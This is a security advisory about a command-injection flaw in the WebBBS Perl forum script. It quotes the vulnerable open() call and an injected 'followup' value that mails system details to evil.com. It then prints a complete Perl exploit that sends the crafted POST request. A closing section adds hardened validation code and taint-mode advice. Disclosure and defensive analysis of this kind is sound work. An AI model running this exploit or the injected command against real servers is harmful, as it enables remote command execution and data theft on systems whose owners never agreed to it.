COMMAND

    WebBBS remote command execution

SYSTEMS AFFECTED

    All versions as of 19 June 2002

PROBLEM

    In Nerf gr0up [http://www.nerf.ru] advisory #7: the WebBBS script
    allows command execution on the server. The script does no filtering
    of the "followup" form field, and the raw value is interpolated into a
    two-argument open(), so remote command execution is possible. The
    vulnerable code is shown below:

    webbbs_post.pl:

        ...
        if ($FORM{'followup'}) {
            $followup = "$FORM{'followup'}";
        }
        ...
        if ($followup) {
            ...
            $subdir = "bbs".int($followup/1000);
            open (FOLLOWUP,"$dir/$subdir/$followup");
            ...

    Just change the value of the $followup variable, e.g. "followup=10" to
    "followup=10;uname -a|mail zlo@evil.com|", to exploit this
    vulnerability.

    Exploit
    =======

        #!/usr/bin/perl
        #
        # nerF gr0up
        #
        # exploit code for
        # WebBBS by Darryl C. Burgdorf
        # all version up to 5.00 are vulnerable
        #
        #
        # this is an exploitation of "followup" bug.
        # it allows remote attacker to execute shell commands.
        # you can find WebBBS script at http://awsd.com/scripts/webbbs/
        #
        # 06.06.2002
        # btr // nerf
        # nerf.ru

        use IO::Socket;

        srand();

        $script = "/cgi-bin/webbbs/webbbs_config.pl";
        $command = "uname -a|mail zlo@evil.com";
        $host = "localhost";
        $port = 80;

        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . rand(254);
        $content = "$content" . "&body=" . rand(254);
        $content="$content"."&followup=".rand(254)."|$command|";
        $content_length = length($content);
        $content_type = "application/x-www-form-urlencoded";

        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post HTTP/1.0\n";
        $buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
        $buf = "$buf" . "$content_length\r\n\r\n$content", 0;

        print "\tnerF gr0up\n";
        print "exploit: WebBBS (awsd.com), version up to 5.00\n";
        print "sent:\n$buf\n";

        if($socket = IO::Socket::INET->new("$host:$port")){
            print $socket "$buf";
            read($socket,$buf,1500);
            print "received:\n$buf\n";
        }

SOLUTION

    Check : http://awsd.com/scripts/webbbs/
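The root cause in the webbbs_post.pl snippet is that the unfiltered form value reaches a two-argument open(), where a trailing "|" makes Perl treat the string as a command to run. The following is an added example of the hardened form of that code path; it is not code from WebBBS or from the advisory's author. The directory layout ($dir/bbsN/<id> with N = int(id/1000)) is taken from the snippet; the function names validate_followup and open_followup and the base directory /var/www/bbs are this example's own assumptions.

```perl
#!/usr/bin/perl
# Added example (not WebBBS code): hardened handling of the "followup" field.
# Assumes the advisory's layout: messages live under "$dir/bbsN/<id>", N = int(id/1000).
use strict;
use warnings;

# Accept only a plain decimal integer of reasonable length. Shell metacharacters,
# a trailing "|", "..", whitespace and empty values are all rejected here, before
# the value gets anywhere near open(). Leading zeros are normalised ("0012" -> 12).
sub validate_followup {
    my ($raw) = @_;
    return undef unless defined $raw;
    return undef unless $raw =~ /\A([0-9]{1,9})\z/;
    return $1 + 0;
}

# Open the follow-up message read-only. Returns a filehandle, or undef if the id
# is invalid or the file cannot be opened. The three-argument open with an
# explicit '<' mode never interprets the name as a pipe or command, so this call
# cannot spawn a shell even if validation were skipped; validation is still
# required to stop path traversal (e.g. "../../etc/passwd").
sub open_followup {
    my ($dir, $raw) = @_;
    my $id = validate_followup($raw);
    return undef unless defined $id;
    my $subdir = "bbs" . int($id / 1000);
    my $path   = "$dir/$subdir/$id";
    open(my $fh, '<', $path) or return undef;
    return $fh;
}

# Constructed test inputs: the benign value from the advisory, the injected value
# from the advisory, a traversal attempt and a value with leading zeros.
my @candidates = (
    '10',
    '10;uname -a|mail zlo@evil.com|',
    '../../etc/passwd',
    '0012',
);
for my $raw (@candidates) {
    my $id = validate_followup($raw);
    printf "%-34s -> %s\n", $raw, defined $id ? "accepted as id $id" : "rejected";
}

# open_followup() on the injected value returns undef without touching the
# filesystem; on "10" it would look for "$dir/bbs0/10" and open it read-only.
# The base directory is an assumed value for this example.
my $fh = open_followup('/var/www/bbs', '10;uname -a|mail zlo@evil.com|');
print "injected value opened: ", (defined $fh ? "yes" : "no"), "\n";
```

Running the CGI under Perl's taint mode (perl -T) is a second line of defence: taint checks refuse to use externally supplied data in an open() that would start a pipe, and the regex capture in validate_followup is also the standard way to untaint a value once it has been checked. Neither measure replaces the vendor fix at the URL above; they close this specific open() pattern wherever it appears.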